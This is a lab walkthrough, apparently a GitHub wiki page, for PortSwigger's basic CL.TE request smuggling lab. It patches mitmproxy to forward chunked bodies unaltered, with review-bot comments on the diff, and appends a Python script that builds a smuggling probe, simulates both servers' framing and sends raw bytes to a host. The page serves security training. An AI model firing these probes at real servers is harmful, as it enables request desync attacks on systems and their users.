HTTP request smuggling - gachikuku/portswigger GitHub Wiki

Practitioner lab:
HTTP request smuggling, basic CL.TE vulnerability

  • Temporary solution (hopefully *sigh*)

    See discussion

  • Detailed approach

    1. Using Nix, create a development environment with the following shell.nix:
      { pkgs ? import <nixpkgs> {} }:
        pkgs.mkShell {
          # nativeBuildInputs is usually what you want -- tools you need to run
          nativeBuildInputs = with pkgs.buildPackages; [ python312Full python312Packages.pip git ];
      }
      Save the file as shell.nix and enter the environment with nix-shell shell.nix.
    2. Follow CONTRIBUTING.md in the mitmproxy repository to set up a development install of mitmproxy from source.
    3. Make the following changes to mitmproxy/proxy/layers/http/_http1.py (mitmproxy/blob/main/mitmproxy/proxy/layers/http/_http1.py on GitHub), so that request and response bodies are forwarded as-is instead of being re-chunked:
      --- _http1.py             2025-01-12 00:26:39
      +++ modified_http1.py     2025-01-12 00:27:13
      @@ -247,10 +247,10 @@
                   yield commands.SendData(self.conn, raw)
               elif isinstance(event, ResponseData):
                   assert self.response
      -            if "chunked" in self.response.headers.get("transfer-encoding", "").lower():
      -                raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
      -            else:
      -                raw = event.data
      +            #if "chunked" in self.response.headers.get("transfer-encoding", "").lower():
      +                #raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
      +
      +            raw = event.data
                   if raw:
                       yield commands.SendData(self.conn, raw)
               elif isinstance(event, ResponseEndOfMessage):
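Review bot: the ResponseData change is not needed for this lab and breaks every response that carries Transfer-Encoding: chunked. The removed code wrapped event.data in chunk framing, which shows event.data is the unframed body at this point; forwarding it raw means the client receives unframed bytes under a chunked header. Keep the change on the request path only (the later RequestData hunk) or gate it on a per-flow marker, and delete the dead `if` block instead of leaving it commented out.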
      @@ -261,7 +261,7 @@
                       and "chunked"
                       in self.response.headers.get("transfer-encoding", "").lower()
                   ):
      -                yield commands.SendData(self.conn, b"0\r\n\r\n")
      +                yield commands.SendData(self.conn, b"")
                   yield from self.mark_done(response=True)
               elif isinstance(event, ResponseProtocolError):
                   if not (self.conn.state & ConnectionState.CAN_WRITE):
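Review bot: `yield commands.SendData(self.conn, b"")` sends nothing and leaves a branch whose only purpose was to emit the terminating chunk; with `0\r\n\r\n` gone, a client that was told Transfer-Encoding: chunked never sees the end of the body and waits until the connection closes. If the response path must change at all, drop the whole `if ... and "chunked" in ...` branch rather than yielding empty data; otherwise revert this hunk together with the ResponseData one.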
      @@ -372,16 +372,15 @@
                   yield commands.SendData(self.conn, raw)
               elif isinstance(event, RequestData):
                   assert self.request
      -            if "chunked" in self.request.headers.get("transfer-encoding", "").lower():
      -                raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
      -            else:
      -                raw = event.data
      +            #if "chunked" in self.request.headers.get("transfer-encoding", "").lower():
      +                #raw = b"%x\r\n%s\r\n" % (len(event.data), event.data)
      +            raw = event.data
                   if raw:
                       yield commands.SendData(self.conn, raw)
               elif isinstance(event, RequestEndOfMessage):
                   assert self.request
                   if "chunked" in self.request.headers.get("transfer-encoding", "").lower():
      -                yield commands.SendData(self.conn, b"0\r\n\r\n")
      +                yield commands.SendData(self.conn, b"")
                   elif http1.expected_http_body_size(self.request, self.response) == -1:
                       yield commands.CloseTcpConnection(self.conn, half_close=True)
                   yield from self.mark_done(request=True)
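Review bot: this is the hunk the lab actually needs, but it is unconditional: every request mitmproxy forwards with Transfer-Encoding: chunked is now sent with its decoded body and no terminating chunk, so ordinary chunked uploads from the browser will desync the upstream connection too. Gate it, for example on the request carrying both Content-Length and Transfer-Encoding, or on a marker set on the flow. Note also that the patch only changes what is written out; what arrives in event.data is whatever mitmproxy's reader took as the body, so confirm on the wire (a packet capture between mitmproxy and the lab) that the `0\r\n\r\nG` body reaches the back end intact before relying on it. As in the earlier hunks, delete the dead `if` instead of commenting it out, and remove the `if "chunked" in ...` branch rather than yielding `b""`.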
    4. Follow the lab's solution, sending the request through the patched mitmproxy.
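As an added worked example (not code from this wiki page or from mitmproxy), the script below builds the basic CL.TE probe, frames the same bytes the way a Content-Length front end and a chunked back end each would, and applies the body re-chunking that the unpatched RequestData/RequestEndOfMessage code performs (the same chunk-framing and `0\r\n\r\n` operations shown in the diff) to show why the payload stops working when a proxy re-encodes it. The host name `vulnerable.example` and the function names are illustrative assumptions; all request bytes are constructed inline, and only `send_raw` touches the network.

```python
# Added example (not from the wiki page or from mitmproxy): the basic CL.TE
# probe framed two ways, plus the effect of a proxy that re-chunks the body.
# Host names are hypothetical placeholders; all request bytes are constructed here.
import socket
import ssl


def build_cl_te_probe(host: str, smuggled: bytes = b"G") -> bytes:
    """Basic CL.TE probe: Content-Length covers the terminating chunk *and* the
    smuggled bytes, while the chunked framing ends at the empty chunk."""
    body = b"0\r\n\r\n" + smuggled
    return (
        b"POST / HTTP/1.1\r\n"
        + b"Host: " + host.encode() + b"\r\n"
        + b"Content-Length: " + str(len(body)).encode() + b"\r\n"
        + b"Transfer-Encoding: chunked\r\n"
        + b"\r\n"
        + body
    )


def _split(raw: bytes):
    """Return (header dict with lower-cased names, bytes after the blank line)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest


def frame_by_content_length(raw: bytes):
    """Front-end view (Content-Length wins): the body is exactly that many bytes;
    anything after it is treated as the start of the next request."""
    headers, rest = _split(raw)
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]


def frame_by_chunked(raw: bytes):
    """Back-end view (Transfer-Encoding wins): read chunks up to the zero-size
    chunk; whatever follows the terminator stays on the socket and is prepended
    to the next request on that connection."""
    headers, rest = _split(raw)
    if b"chunked" not in headers.get(b"transfer-encoding", b"").lower():
        raise ValueError("not a chunked message")
    body, pos = b"", 0
    while True:
        line_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:line_end].split(b";")[0], 16)  # drop chunk extensions
        pos = line_end + 2
        if size == 0:
            while True:  # skip trailer lines up to the blank line
                line_end = rest.index(b"\r\n", pos)
                line, pos = rest[pos:line_end], line_end + 2
                if not line:
                    return body, rest[pos:]
        body += rest[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def rechunk_like_unpatched_proxy(raw: bytes) -> bytes:
    """What the unpatched request path does to the body: wrap it in a single
    chunk and append the terminating chunk. A chunked back end then sees a
    well-formed body with nothing left over, so nothing is smuggled."""
    head, _, body = raw.partition(b"\r\n\r\n")
    return head + b"\r\n\r\n" + b"%x\r\n%s\r\n" % (len(body), body) + b"0\r\n\r\n"


def send_raw(host: str, port: int, payload: bytes, use_tls: bool = False,
             timeout: float = 5.0) -> bytes:
    """Send bytes verbatim (no HTTP library re-framing) and return the reply.
    Network use only; the lab is served over TLS, so pass use_tls=True."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(payload)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    probe = build_cl_te_probe("vulnerable.example")  # hypothetical host
    print("front end (CL):", frame_by_content_length(probe))
    print("back end (TE): ", frame_by_chunked(probe))
    print("after re-chunking:", frame_by_chunked(rechunk_like_unpatched_proxy(probe)))
```

Run it offline to see the split: the Content-Length view consumes all six body bytes, the chunked view stops at the empty chunk and leaves `G` on the connection, and the re-chunked version leaves nothing over, which is exactly the difference the mitmproxy patch above is meant to remove. Send the probe with `send_raw(..., use_tls=True)` straight to the lab, or through the patched proxy, only against a target you are authorised to test.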